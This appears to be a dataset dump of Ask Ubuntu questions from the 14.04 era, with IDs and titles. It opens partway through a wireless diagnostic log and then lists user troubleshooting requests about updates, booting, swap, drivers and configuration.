v0000168cd0000002asv00001a32sd00000306bc*sc*i* alias : pci : v0000168cd0000002asv000011adsd00006642bc*sc*i* alias : pci : v0000168cd0000002asv000011adsd00006632bc*sc*i* alias : pci : v0000168cd0000002asv0000105bsd0000e01fbc*sc*i* alias : pci : v0000168cd0000002asv00001a3bsd00001c71bc*sc*i* alias : pci : v0000168cd0000002asv*sd*bc*sc*i* alias : pci : v0000168cd00000029sv*sd*bc*sc*i* alias : pci : v0000168cd00000027sv*sd*bc*sc*i* alias : pci : v0000168cd00000024sv*sd*bc*sc*i* alias : pci : v0000168cd00000023sv*sd*bc*sc*i* depends : ath9k_hw , mac80211 , ath9k_common , cfg80211 , ath intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > : a1:7e : ef:58 : c6 : ac:5e:9a:85:71:2c:92:08 : df sig_hashalgo : sha512 parm : debug : debugging mask ( uint ) parm : nohwcrypt : disable hardware encryption ( int ) parm : blink : enable led blink on activity ( int ) parm : btcoex_enable : enable wifi-bt coexistence ( int ) parm : bt_ant_diversity : enable wlan/bt rx antenna diversity ( int ) parm : ps_enable : enable wlan powersave ( int ) filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_common.ko license : dual bsd/gpl description : shared library for atheros wireless 802.11n lan cards . author : atheros communications srcversion : 696b00a6c59713ec0966997 depends : ath , ath9k_hw intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > : a1:7e : ef:58 : c6 : ac:5e:9a:85:71:2c:92:08 : df sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath9k/ath9k_hw.ko license : dual bsd/gpl description : support for atheros 802.11n wireless lan cards . author : atheros communications srcversion : 4809f3842a0542cd6b556d3 depends : ath intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > : a1:7e : ef:58 : c6 : ac:5e:9a:85:71:2c:92:08 : df sig_hashalgo : sha512 filename : /lib/modules/3.13.0-24-generic/kernel/drivers/net/wireless/ath/ath.ko license : dual bsd/gpl description : shared library for atheros wireless lan cards . author : atheros communications srcversion : 88a67c5359b02c5a710afcf depends : cfg80211 intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions 686 signer : magrathea : glacier signing key sig_key : < mac address removed > : a1:7e : ef:58 : c6 : ac:5e:9a:85:71:2c:92:08 : df sig_hashalgo : sha512 # # # # # modules # # # # # lp # # # # # blacklist # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac [ /etc/modprobe.d/fbdev-blacklist.conf ] blacklist arkfb blacklist aty128fb blacklist atyfb blacklist radeonfb blacklist cirrusfb blacklist cyber2000fb blacklist gx1fb blacklist gxfb blacklist kyrofb blacklist matroxfb_base blacklist mb862xxfb blacklist neofb blacklist nvidiafb blacklist pm2fb blacklist pm3fb blacklist s3fb blacklist savagefb blacklist sisfb blacklist tdfxfb blacklist tridentfb blacklist viafb blacklist vt8623fb [ /etc/modprobe.d/libpisock9.conf ] blacklist visor # # # # # udev rules # # # # # # pci device 0x8086:0x1050 ( e100 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x168c:0x0023 ( ath9k ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # [ 10.844865 ] intel_rng : do n't want to disable this in firmware setup , and if [ 13.545939 ] ath : eeprom regdomain : 0x10 [ 13.545940 ] ath : eeprom indicates we should expect a direct regpair map [ 13.545943 ] ath : country alpha2 being used : co [ 13.545944 ] ath : regpair used : 0x10 [ 18.175392 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 18.183358 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 6496.035165 ] wlan0 : authenticate with < mac address removed > [ 6496.044241 ] wlan0 : direct probe to < mac address removed > ( try 1/3 ) [ 6496.248022 ] wlan0 : direct probe to < mac address removed > ( try 2/3 ) [ 6496.452023 ] wlan0 : direct probe to < mac address removed > ( try 3/3 ) [ 6496.656020 ] wlan0 : authentication with < mac address removed > timed out [ 6497.380862 ] wlan0 : authenticate with < mac address removed > [ 6497.397872 ] wlan0 : direct probe to < mac address removed > ( try 1/3 ) [ 6497.600021 ] wlan0 : direct probe to < mac address removed > ( try 2/3 ) [ 6497.804021 ] wlan0 : direct probe to < mac address removed > ( try 3/3 ) [ 6498.008021 ] wlan0 : authentication with < mac address removed > timed out [ 6499.130876 ] wlan0 : authenticate with < mac address removed > [ 6499.136436 ] wlan0 : direct probe to < mac address removed > ( try 1/3 ) [ 6499.340021 ] wlan0 : direct probe to < mac address removed > ( try 2/3 ) [ 6499.544021 ] wlan0 : direct probe to < mac address removed > ( try 3/3 ) [ 6499.748020 ] wlan0 : authentication with < mac address removed > timed out [ 6501.370856 ] wlan0 : authenticate with < mac address removed > [ 6501.376427 ] wlan0 : direct probe to < mac address removed > ( try 1/3 ) [ 6501.580023 ] wlan0 : direct probe to < mac address removed > ( try 2/3 ) [ 6501.784021 ] wlan0 : direct probe to < mac address removed > ( try 3/3 ) [ 6501.988022 ] wlan0 : authentication with < mac address removed > timed out [ 6513.232923 ] wlan0 : authenticate with < mac address removed > [ 6513.240608 ] wlan0 : direct probe to < mac address removed > ( try 1/3 ) [ 6513.444022 ] wlan0 : direct probe to < mac address removed > ( try 2/3 ) [ 6513.648023 ] wlan0 : direct probe to < mac address removed > ( try 3/3 ) [ 6513.852019 ] wlan0 : authentication with < mac address removed > timed out # # # # # # # # # # wireless info end # # # # # # # # # # # #
468710	failed to update in ubuntu 14.04	i installed ubuntu 14.04 lts and ran the command : sudo apt-get update it gives the following error : err http : //in.archive.ubuntu.com trusty inrelease err http : //in.archive.ubuntu.com trusty-updates inrelease err http : //in.archive.ubuntu.com trusty-backports inrelease err http : //security.ubuntu.com trusty-security inrelease err http : //archive.canonical.com trusty inrelease err http : //extras.ubuntu.com trusty inrelease err http : //in.archive.ubuntu.com trusty release.gpg could not resolve 'in.archive.ubuntu.com' err http : //in.archive.ubuntu.com trusty-updates release.gpg could not resolve 'in.archive.ubuntu.com' err http : //security.ubuntu.com trusty-security release.gpg could not resolve 'security.ubuntu.com' err http : //archive.canonical.com trusty release.gpg could not resolve 'archive.canonical.com' err http : //extras.ubuntu.com trusty release.gpg could not resolve 'extras.ubuntu.com' err http : //in.archive.ubuntu.com trusty-backports release.gpg could not resolve 'in.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/inrelease w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty/release.gpg could not resolve 'in.archive.ubuntu.com' w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-updates/release.gpg could not resolve 'in.archive.ubuntu.com' w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/trusty-backports/release.gpg could not resolve 'in.archive.ubuntu.com' w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/release.gpg could not resolve 'security.ubuntu.com' w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/release.gpg could not resolve 'archive.canonical.com' w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/release.gpg could not resolve 'extras.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . now what should i do now ?
468711	thinkpad x240 : choose battery to charge	the lenovo thinkpad x240 has an internal battery and an external battery . is there a way to choose to charge the external battery before the internal battery ? currently the internal battery is charged first .
468714	visualboyadvance emulator only returns a blank screen	i recently installed visual boy advance from the software center . and i downloaded a romhack and whenever i open it with vba the only thing that happens is i get a blank screen on vba with a percentage at the top . i read on a different question to try using mednafen . so , i went and installed that and got the same result . so , if anybody has any kind of advice to help me out here it would be much appreciated .
468717	unable to upgrade from saucy to trusty	i just upgraded from precise ( 12.04 ) to saucy ( 13.10 ) and i am presently trying to upgrade to trusty ( 14.04 ) . however , i am encounter some problems during the upgrade via upgrade-manager . in the middle of calculating changes , upgrade-manger just stopped with the following message : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i do n't want to do a clean install as this would mean rebuilding all my program packages from scratch . how should i resolve this issue ? problemtype : bug distrorelease : ubuntu 13.10 package : ubuntu-release-upgrader-core 1:0.205.6 procversionsignature : ubuntu 3.11.0-20.35-generic 3.11.10.6 uname : linux 3.11.0-20-generic x86_64 apportversion : 2.12.5-0ubuntu2.2 architecture : amd64 crashdb : ubuntu date : sun may 18 23:18:44 2014 installationdate : installed on 2014-04-08 ( 40 days ago ) installationmedia : ubuntu 12.04.4 lts `` precise pangolin '' - release amd64 ( 20140204 ) markforupload : true packagearchitecture : all sourcepackage : ubuntu-release-upgrader upgradestatus : upgraded to saucy on 2014-05-18 ( 0 days ago )
468718	start applications in systemtray	i 'm using cinnamon as my de . i inserted the seafile sync client ( seafile-applet ) to start synchonisation automatically . but it is really annoying , that the application-window starts , too . so is there a way to start applications in a minimized or system-tray mode ?
468719	nvidia-prime switching to intel stopped working	i can no longer switch between my intel and nvidia cards , it used to work and my default card was intel now for some reason its nvidia and i can no longer switch and the prime profile option has disappeared from nvidia-settings . when launching nvidia-settings from terminal i get : libgl error : failed to load driver : swrast failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory ** message : prime : no offloading required . abort ** message : prime : is it supported ? no i do n't really know when it stopped working but some time in the last 3 days i think . any one knows what has happend ?
468720	ati radeon hd4870 + kubuntu 14.04	i am currently looking for a possibility to install drivers for my ati radeon hd4870 on my kubuntu 14.04 . the xserver is on version 1.51 . unfortunately , the ati hd series under 5xxx are no longer supported and are now put under the category 'legacy ' . but , neither do i want to downgrade my ubuntu , nor do i want to buy a new graphic card . are there any workarounds or opensource drivers i can use ? without installing any third party drivers , my graphics are lagging as hell and i ca n't play any 3d games of course .
468721	how can i empty the trash using terminal ?	i am not able to search trash anywhere . can you please tell me a command or anything like that to empty the trash using terminal ?
468723	how to use espeak command in ubuntu ?	i would like to know how to use this command , and what is its benefits for a user . i know its for speech and can read documents , but how to use it ?
468726	12.04 w/3.2.0-60-generic boot fail	i am new to ubuntu , speak to me as if i 'm an elementary student . i do not know how to reprogram or edit code , but i could do it if i 'm given step by step instructions . i was helping a friend with her computer ( removing the login password option and adding vlc media player ) when the computer asked for permission to update ubuntu . i gave it permission and it added 50+ updates . when i restarted the computer it would not load ubuntu and kept giving error : invalid environment block after pressing `` any key '' the ubuntu words come on the screen then it ends at : busybox v1.18.5 built in shell enter help for a list of built-in commands i 've googled solutions , but none have worked . it appears i 'm not the only one with update problems , but it does n't look like ubuntu has solved them . i can not get into bios to update my boot configuration to boot from a cd or flash drive ( it is password protected and my friend purchased it used , so she does not know the password ) . i have tried to start in `` safe '' mode , but `` safe '' mode brings me to this same screen ( initramfs ) . i 've tried to load an older version of ubuntu , but that just hangs on a black screen ( there are 4 older versions listed on the `` grub '' menu ) . if no one knows a solution , could you help me figure out how to access my d : drive to load another os ? using dos ( cd d : / ) does not work at the ( initramfs ) prompt . the computer is an acer aspire 5610 . i have searched your forum for other answers , but none have worked .
468728	heimdall failed to confirm end of file transfer sequence !	i have problem flashing my galaxy core system with heimdall using system.img.ext4 ~/desktop/lll $ sudo heimdall flash -- system system.img.ext4 heimdall v1.4.0 copyright ( c ) 2010-2013 , benjamin dobell , glass echidna this software is provided free of charge . copying and redistribution is encouraged . if you appreciate this software and you would like to support future development please consider donating : initialising connection ... detecting device ... claiming interface ... attempt failed . detaching driver ... claiming interface again ... setting up interface ... initialising protocol ... protocol initialisation successful . beginning session ... some devices may take up to 2 minutes to respond . please be patient ! session begun . downloading device 's pit file ... pit file download successful . uploading system 14 % error : failed to confirm end of file transfer sequence ! error : system upload failed ! ending session ... error : failed to send end session packet ! releasing device interface ... re-attaching kernel driver ... this is a log from my terminal . i tried using older version of heimdall but had no success . curently using v1.4.0 on ubuntu 13.10 64bit version . firmware was downloaded from http : //www.sammobile.com/firmwares/3/ ? download=24508 if anybody needs more info please write comment want information you need
468732	ca n't login my account in ubuntu 14.04. after zsnes emulator froze . guest season works fine	i 've played the zsnes emulator and the game froze after one hour . since nothing else worked besides ctrl+alt+f1 i had to reboot the system . after trying to access my account from the login screen it takes a few seconds , the screen turns black for 1 second and it takes me back to the login screen . i can enter my account trough tty but not the gui . guest season works also fine . i 've seen many people have the same problem but the answers i found here did n't help me . one example i tried was sudo chown user : user ~/.xauthority
468733	my computer wo n't boot up correctly after editing bios	i have a toshiba c55 i5 with ubuntu installed . i was looking in the bios and i made a change from boot mode uefi to the other mode `` ocm `` or `` osm `` . now when i turn on my computer , i get this error message : reboot and select proper boot device or insert boot media in selected boot device and press a key i turned it back to uefi mode but without any change . i even tried to boot it on cd/usb of windows but without any change . what should i do ?
468734	no swap partition !	i 'm in dire need of help . my system has become incredibly laggy and hardly usable . i have realised that this is because for some reason i 'm running without virtual memory ( this is not intentional ) . it is a recent phenomenon and the system was much more responsive until a couple of days ago , so i can only summarise it is a recent phenomenon . i can not think of anything i did to cause this ( except attempt to use the hibernation feature , which failed - did it maybe fill up my swap partition with garbage and leave it there ? i do not know . how could i find out ? ) as a novice my difficulty is compounded by the fact that i am running on a fully encrypted ssd using luks . everybody keeps posting me links to pages where people have posted links , and honestly i am hopelessly out of my depth . searching for information with a machine that takes ten seconds to register a keypress is no fun , i assure you . ( of course this situation persists across reboots ) first , proof of the situation : swapon indicates i have no swap : user @ host : ~ $ sudo swapon -s [ sudo ] password for user : filename type size used priority user @ host : ~ $ secondly , the output of df , indicating how my filesystems are mounted : user @ user~ $ df filesystem 1k-blocks used available use % mounted on /dev/mapper/ubuntu -- vg-root 237978256 14110548 211756044 7 % / none 4 0 4 0 % /sys/fs/cgroup udev 3829132 4 3829128 1 % /dev tmpfs 3844736 8 3844728 1 % /tmp tmpfs 768948 1256 767692 1 % /run none 5120 0 5120 0 % /run/lock none 3844736 20948 3823788 1 % /run/shm none 102400 16 102384 1 % /run/user tmpfs 3844736 0 3844736 0 % /var/spool tmpfs 3844736 24 3844712 1 % /var/tmp tmpfs 3844736 624 3844112 1 % /var/log /dev/sda1 240972 84550 143981 37 % /boot /home/user/.private 237978256 14110548 211756044 7 % /home/user user @ host : ~ $ next , my /etc/fstab file , as it currently stands : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu -- vg-root / ext4 discard , noatime , nodiratime , errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=db8c65e2-82fd-492c-8f02-8ad140f7337b /boot ext2 defaults 0 2 /dev/mapper/ubuntu -- vg-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 tmpfs /var/spool tmpfs defaults , noatime , mode=1777 0 0 tmpfs /var/tmp tmpfs defaults , noatime , mode=1777 0 0 tmpfs /var/log tmpfs defaults , noatime , mode=1777 0 0 finally , i 'd like to mention that i booted into a live-usb distro , and used system-config-lvm to have a look at my unmouned lvm , and /dev/ubuntu-vg/swap_1 is indeed there . i do n't know what else to do . it 's taken three hours to type this . edit : adding output of cat /etc/exports/ : user @ host : ~ $ cat /etc/exports cat : /etc/exports : no such file or directory user @ host : ~ $ and the output of top top - 19:10:16 up 32 min , 3 users , load average : 0.18 , 0.11 , 0.07 tasks : 202 total , 1 running , 201 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 0.7 us , 0.7 sy , 0.0 ni , 98.5 id , 0.1 wa , 0.0 hi , 0.0 si , 0.0 st kib mem : 7689472 total , 1220864 used , 6468608 free , 44020 buffers kib swap : 0 total , 0 used , 0 free . 549276 cached mem pid user pr ni virt res shr s % cpu % mem time+ command 1396 root 20 0 288660 48264 40612 s 1.7 0.6 0:03.80 xorg 2279 user 20 0 856444 16252 11668 s 1.0 0.2 0:01.67 lxterminal 3140 user 20 0 1169836 142804 60396 s 0.7 1.9 0:09.86 chrome 635 root -51 0 0 0 0 s 0.3 0.0 0:00.41 irq/62-iwlwifi 3118 ntp 20 0 33504 2136 1528 s 0.3 0.0 0:00.04 ntpd 3326 user 20 0 1038132 111152 48620 s 0.3 1.4 0:11.06 chrome 3374 user 20 0 29192 1736 1212 r 0.3 0.0 0:00.03 top 1 root 20 0 34052 3436 1484 s 0.0 0.0 0:03.97 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/0 5 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0h 7 root 20 0 0 0 0 s 0.0 0.0 0:00.24 rcu_sched 8 root 20 0 0 0 0 s 0.0 0.0 0:00.08 rcuos/0 9 root 20 0 0 0 0 s 0.0 0.0 0:00.06 rcuos/1 10 root 20 0 0 0 0 s 0.0 0.0 0:00.07 rcuos/2 11 root 20 0 0 0 0 s 0.0 0.0 0:00.10 rcuos/3 12 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuos/4 searching around desperately ( as best one can while faced with my present situation , anyway ) i have found this ancient thread about somebody having problems with cryptswap , but honestly i 'm too much of a novice to understand what he is on about and how to use mkswap to remake the swap partition ( honestly , it is n't even clear to me what parameters i would need to pass to mkswap to avoid nuking my system by accidentally overwriting my main partition ... i saw in fstab that i seem to have two entries that look swap-like ( swap_1 and cryptswap ) and i do not know which of the two would be the hypothetical target , not to mention all the deep jargon . )
468735	why is ubuntu failing to recognise folders on cds ?	i 'm completely new to ubuntu , but thought i 'd give it a go to try and do something different than mic****ft , i 'm running 14.04 on an old amd athlon le-1640 , with 3gb ram on this pc i am only running ubuntu , and things run fine , i 've managed to mount 2 screens and run them in extended desktop mode , however i 'm struggling with several things - i 'll ask each one in a separate question , but here '' s my first . i have 2 cd/dvd drives , and i 'm trying to back up onto hard drives my collection of mp3s currently on cds ( yes i know i 'm ancient , who uses cds now ! ) however when i first boot up the pc i can load one cd into each drive and ubuntu will read all the folder and file data , great so far , but when i 've done with these and eject them and put new cds in the drive , one sees nothing , the other opens one of the folders and lists the files in side as the whole content , no matter what i try it just wo n't do it , but if i shutdown and reboot the pc it will then as before read all the content on each cd , i 'm stuck now - have searched the help sites but getting no-luck and to be honest some of the terminal codings confuse me ( i 'm not overly savvy that way ) , so thanks in advance ian
468737	no swap in xubuntu 14.04 lte with full disk/system encryption	i 'm a newbee to linux . i installed xubuntu 14.04 lte on my 1.6ghz/2gb ram/120 gb ssd hdd netbook . everything goes smoothly , except i realized that during booting and logging in there was a warning that swap file was unavailable . i used the hints from this forum and from others to remove this , but the system still lacks swap . please note that i had no such issues with a similar notebook installation , during which i did not use encrypted partition etc . so , in the netbook with issues , gparted reports the following partitions : /dev/sda1 [ keys icon ] ext2 /boot 243mib /dev/sda2 extended 111.55 gib /dev/sda5 [ exclamation mark icon ] crypt-liks 111.55 gib so , no swap is available . is it really an issue , or shall i used a certain file as a swap since the disk and partitions are encrypted ? i 'd appreciate the suggestions from expert users .
468738	screen turns black when using launcher icons	i may have found a new bug , i ca n't find anything resembling the problem i 'm having . i recently upgraded to 14.04 from 13.10 , and the launcher is virtually useless . if i hover over any launcher icon or right click any launcher icon , my entire screen goes black , save for my mouse cursor . no launcher , no panel , nothing . upon moving my mouse away from the icon , or clicking outside the launcher space , the screen returns to normal . i 'm guessing this has something to do with either unity or compiz , or my context menu is bugged . i 've already tried restarting unity , compiz , my computer , and using the unity reset tool . i 'll keep looking around , but if anyone has any suggestions , please let me know .
468743	when i choose installed ubuntu ( dual boot : ubuntu with windows 7 ) on asus ux32vd laptop , it always get stuck and give me command line	i 've just installed ubuntu 12.04 lts to dual boot with windows 7 on asus zenbook , but every time i choose ubuntu from grub menu , it always get stuck at this error and wo n't boot : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/920903aa-762f-40d2-8126-87f4b0e6f975 does not exist . dropping to a shell ! busybox v1.19.3 ( ubuntu 1:1.10.3-7ubuntu1.1 ) built-in shell ( ash ) enter 'help ' for a lost of built-in commands . ( initramfs ) i updated him to 14.04 lts . i tried boot-repair , but it still not helped . after i found this advise here from ask ubuntu . what only helped me from there , is : ( initramfs ) blkid ( initramfs ) blockdev -- rereadpt /dev/sda ( initramfs ) blkid ( initramfs ) exit but it help me to login and every time that i reboot my laptop i should to do that . please , someone help me to repair this error .
468746	how to prevent the recovery mode menu to come up !	i arranged my system to power on due to any sudden power off and auto-start a program . the problem is that due to bad shut down sometimes a list comes up to use `` normal mode '' or `` recovery mode '' or `` memtest , and it waits for the user to choose . it prevents my system to work whenever i 'm not behind the system . how can i omit this menu or at least put a time counter to choose the first option `` normal mode '' , just like windows ? os : ubuntu 14.04 , mainboard : msi z77a-gd65
468748	how to add kernel-package header	i want to install kernel-package , but this error shown : building dependency tree reading state information ... done package kernel-package is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'kernel-package ' has no installation candidate what should i do ?
468750	how to install extention tools for virtualbox	when i try to open install windows 7 in my virtual machine it shows this error . can anyone help me to solve this issue ? this is the error shown : after downloading the extention pack the following error is shown after installing the extention pack for oracle vm virtual box this error is shown
468753	recursive dependencies	i can reveal package dependencies like this apt-cache show wget | grep ^depends however i would like to also list the dependencies for the dependencies , so the output would be something like this wget libc6 libgcc1 gcc-4.9-base libidn11 libssl1.0.0 debconf libuuid1 passwd libpam0g libselinux1 libsemanage1 libpam-modules debianutils zlib1g this example has a depth of 4 but i would like the actual solution to have full depth .
468755	tablet format for ubuntu touch emulator ( eta )	does anyone have any idea how long we are likely to be waiting for the tablet format to be released for the ubuntu touch emulator ? from what i can see so far the emulator only emulates a phone . i have found suggestions that the tablet format is being or is planned to be developed but ca n't find details on when it is hoped this will be available . ( i realise that any date will be approximate and probably be pushed back but some idea would be helpful . even better would be a page where i could follow the progress of the project . )
468757	why ca n't i get a gui via rdp ?	i 've started up an ubuntu vm on azure . i logged in via putty and installed both ubuntu-desktop and xrdp . when i remote desktop to the vm , i get presented with a graphical log in ( not ubuntu 's ) and i get confirmation that i have successfully logged in . however , i do n't get the ubuntu desktop , instead the screen stays on a black and white polka dot type pattern . i 've restarted different services , the entire vm , checked for any need updates in apt-get but nothing has solved it . any ideas what i need to do ?
468758	modprobe ndiswrapper error	i 'm trying to get my wusb300n card working on my desktop . i 've downloaded ndiswrapper-1.59 and when i run make , everything goes fine except for a warning warning : `` mcount '' [ ~/downloads/ndiswrapper-1.59/driver/ndiswrapper.ko ] undefined ! i am still able to make install it and it works . however , when i run sudo modprobe ndiswrapper i get error : could not insert 'ndiswrapper ' : unknown symbol in module , or unknown parameter ( see dmesg ) and dmesg gives ndiswrapper : unknown symbol mcount ( err 0 ) the same name from the make warning . some other info : $ uname -r 3.11.0-20-generic $ sudo modprobe -n -v -- first-time ndiswrapper insmod /lib/modules/3.11.0-20-generic/misc/ndiswrapper.ko i 'm on 64 bit ubuntu 13.10
468762	read-only file system error when i try to create a new directory	i have this problem when i do : sudo mkdir /media/virtual_1 sudo : unable to open /var/lib/sudo/noob-scientist/0 : read-only file system mkdir : can not create directory `/media/virtual_1 ' : read-only file system i have installed lusca , dnsutils , bind9 , apparmor , and using encrypted home directory after all these i 'm getting read write error with no permission even no access to external portable drive .
468764	how do i enable pâté python plugin in kate ?	on kubuntu 14.04 i 'd like to use a python plugin called pâté in kate . it 's listed as a plugin there . but then it shows an error in the configuration dialogue . the help page is not useful at all . perhaps i have to install some packages ( pysmell ? ) , but this is just a guess . how do i get this python plugin to work ?
468767	ca n't find a way to fix unity !	i did everything i could do that was listed on unity does n't load , no launcher , no dash appears , but even with unity , nothing is happening ! all i can see is my desktop and my desktop icons ! i can open programs that are on my desktop fine , but i ca n't close or move or minimize them ! i can minimize and close google chrome , however . any help on what to do ? rough and improvised picture can be shown . i am currently using my functional guest account .
468770	xephyr on ubuntu 14.04 via ssh is buggy ?	i tried xephyr on ubuntu 12.04.4 via ssh ( putty+xming ) x-forwarding running wm ( fluxbox , xfce4 ) , which runs well . however , with ubuntu 14.04 ( server ) , xephyr got `` caught signal 11 '' and quit on the test as below xephyr -ac -screen 800x600 -reset :1 & since currently the version number of xephyr is 2:1.15.1-0ubuntu2 , which it is completely different from 2:1.11.4-0ubuntu10 which runs on ubuntu 12.04 , so i do n't have other option to downgrade . anyone had the similar issue with xephyr on 14.04 lts ? or just me.. any comment is appreciated . thanks .
468772	tomcat does not recognize java_home	i 've installed ubuntu 14.04 server , extracted jdk1.8u5 and tomcat7 , and added the following to .profile ( i also tried adding it to .bashrc with similar [ non- ] results ) : export java_home=/opt/java/jdk1.8.0_05 export path= $ path : $ java_home/bin when i run echo $ java_home i get the expected result of /opt/java/jdk1.8.0_05 . i can also run java -version and get the correct response from java . so far so good . so now i try to startup tomcat ( tried also catalina.sh ) , and i get the following : user @ ubuntu : ~ $ sudo /opt/tomcat7/apache-tomcat-7.0.53/bin/startup.sh neither the java_home nor the jre_home environment variable is defined at least one of these environment variable is needed to run this program but ... i just tried echo $ java_home and it worked ?
468774	how do i get ubuntu for tablets ?	it says on the website that ubuntu for tablets runs on intel x64 hardware . great ! where can i download it please ? nick
468776	keyboard layout occasionally changes	i 'm using an english ( uk ) keyboard , i set it up so when installing ubuntu . english ( us ) appears as an alternative layout in the text entry settings window . every few days the layout configuration will switch to the english ( us ) layout . i can revert back to the uk configuration either by removing the us layout ( and then adding it back a few days later when the layout or changes again ) or by toggling back and forth via the unity icon ( appears as en1 styled like a chemical element ) . i 'd like the keyboard layout to remain as english ( uk ) on a permanent basis and would appreciate if anyone could explain the cause and solution to this problem .
468778	how do i select keyboard layout 103p on `` system settings '' > > keyboard , on ubuntu 14.04 ?	how do i select keyboard layout 103p on `` system settings '' > > keyboard , on ubuntu 14.04 ? my keyboard layout is `` keyboard layout 103p english ( united states , australia , new zealand , south africa ) '' , as shown in http : //ascii-table.com/keyboard.php/103p-1 and i just ca n't find an equivalent layout in the configuration manager .
468780	editing menus within xfce	i am using xubuntu 14.04 . i would like to customise it to my needs . just for anxiety i would like to change the menu contents of `` about xfce `` . i usually change names by editing /usr/share/applications/xfce-about.desktop file . but now i want to change the contents of it . where is the coded file ? note : for customization i use ubuntu builder ! i took a look on many links and found these are all what i am doing right now . see we have a menu named `` about xfce `` when we click it , it will show up a window . inside that some contents describing it like say '' xfce is a collection of programs that together provide a full-featured desktop environment . the following programs are part of the xfce core : `` my requirement is to change this long description in that application . how can i achieve that .
468785	sluggish/unresponsive mouse in 14.04	just upgraded from 13 to 14.04 and the mouse on the touchpad is slow and/or unresponsive when dragging around the screen . no issue whatsoever in 13 .
468787	developing on lubuntu	i 'm currently doing a lot of development with c++ and in python . much of this is with an embedded systems slant . having access to things like the newest versions of gcc/clang/etc and various libraries is very important to me , can these packages be found in the official repositories . will i run into problems if i need to install more recent versions of these development packages ? is lubuntu is a viable platform for development ?
468788	internet connection occasionally becomes mis-configured	~2-3 times a month i 'll be using the internet and the connection speed will drop to 0kbps . at this point i usually try disconnecting and reconnecting from the network which solves the problem approximately 30 % of the time . quite often however i 'll have to delete the entry and re-add it via the `` network connections '' window which will solve the problem about 20 % of the time . often the connection is misconfigured as having a 40-bit wep encryption ( it is actually wpa ) , changing it to the appropriate setting and attempting to reconnect will often cause it to attempt to connect to a network of the form `` # 1+ '' still configured as wep . assuming the internet is still faltering there 'll be on of three outcomes : i can not reconnect to the network , i can reconnect but receive no traffic or i can reconnect but a ping sent to 192.168.0.1 may have around 20,000ms of latency and 60 % packet loss . after a few hours the connection will normally fix itself somehow . i can access 127.0.0.1 just fine and access to the internet from other devices using the same network is unaffected . here 's a relatively small sample from /var/log/syslog around the same time the connection failed ( there are around 20k lines of this stuff ) http : //pastebin.com/c4xzt2dy
468790	nam installation problem in ns2 , segmentation fault	i am having trouble running the network animator on ubuntu14.04 . it gives me this error segmentation fault ( core dumped ) . i am using nam version 1.15 and ns2-2.34 .
